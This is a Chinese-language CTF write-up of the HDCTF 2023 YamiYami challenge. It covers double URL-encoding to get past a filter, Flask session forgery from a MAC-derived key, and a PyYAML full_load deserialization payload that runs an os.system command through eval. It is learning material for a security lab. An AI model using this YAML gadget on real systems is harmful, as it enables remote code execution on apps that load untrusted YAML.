[HDCTF 2023]YamiYami python中的另一种反序列化--yaml

今天做了到新颖的题，关于python中的yaml反序列化的题目，直接上题吧。

发现第一个链接的参数是?url=XXXX,一眼利用点。

嗯？直接出了flag，应该是非预期解。再看看有app.py，那就试试。发现app.*被过滤了，二次编码绕过试试。

点击查看代码

@app.route('/')
def index():session['passport'] = 'YamiYami'return '''Welcome to HDCTF2023 <a href="/read?url=https://baidu.com">Read somethings</a><br>Here is the challenge <a href="/upload">Upload file</a><br>Enjoy it <a href="/pwd">pwd</a>'''
@app.route('/pwd')
def pwd():return str(pwdpath)
@app.route('/read')
def read():try:url = request.args.get('url')m = re.findall('app.*', url, re.IGNORECASE)n = re.findall('flag', url, re.IGNORECASE)if m:return "re.findall('app.*', url, re.IGNORECASE)"if n:return "re.findall('flag', url, re.IGNORECASE)"res = urlopen(url)return res.read()except Exception as ex:print(str(ex))return 'no response'def allowed_file(filename):for blackstr in BLACK_LIST:if blackstr in filename:return Falsereturn True
@app.route('/upload', methods=['GET', 'POST'])
def upload_file():if request.method == 'POST':if 'file' not in request.files:flash('No file part')return redirect(request.url)file = request.files['file']if file.filename == '':return "Empty file"if file and allowed_file(file.filename):filename = secure_filename(file.filename)if not os.path.exists('./uploads/'):os.makedirs('./uploads/')file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))return "upload successfully!"return render_template("index.html")
@app.route('/boogipop')
def load():if session.get("passport")=="Welcome To HDCTF2023":LoadedFile=request.args.get("file")if not os.path.exists(LoadedFile):return "file not exists"with open(LoadedFile) as f:yaml.full_load(f)f.close()return "van you see"else:return "No Auth bro"
if __name__=='__main__':pwdpath = os.popen("pwd").read()app.run(debug=False,host="0.0.0.0")print(app.config['SECRET_KEY'])

最开始做的时候不懂yaml反序列化，后来看了wp发现了，yaml.full_load()将YAML格式的字符串或文件加载成Python对象，造成了反序列化漏洞。那我们的步骤就变为了，伪造session，上传yaml文件(改后缀，因为前面有黑名单，改为txt)，boogipop传入参数?file=uploads/1.txt,再在read页面进行文件读取。 seeion伪造需要涉及到uuid，可以看我前边的文章，当然自己搜也可以。得到mac为02:42:ac:02:ff:17。跑脚本获取key。

得到session了，那就开始上传文件，yaml详细解释看 https://www.cnblogs.com/icfh/p/17760855.html

点击查看代码

payload: 我发现很多题只有在tmp下有权限？？？本人比较穷，所以尽可能以后做题不nc!!python/object/new:strargs: []state: !!python/tuple- "__import__('os').system('cat /tmp/flag_13_114514 > /tmp/1.txt')"  - !!python/object/new:staticmethodargs: []state:update: !!python/name:evalitems: !!python/name:list

上传后访问boogipop?file=uploads/1.txt

成功，利用read页面查看/tmp/1.txt

总结：

1. url二次编码绕过
2. uuid相关session伪造
3. yaml.full_load() 触发yaml反序列化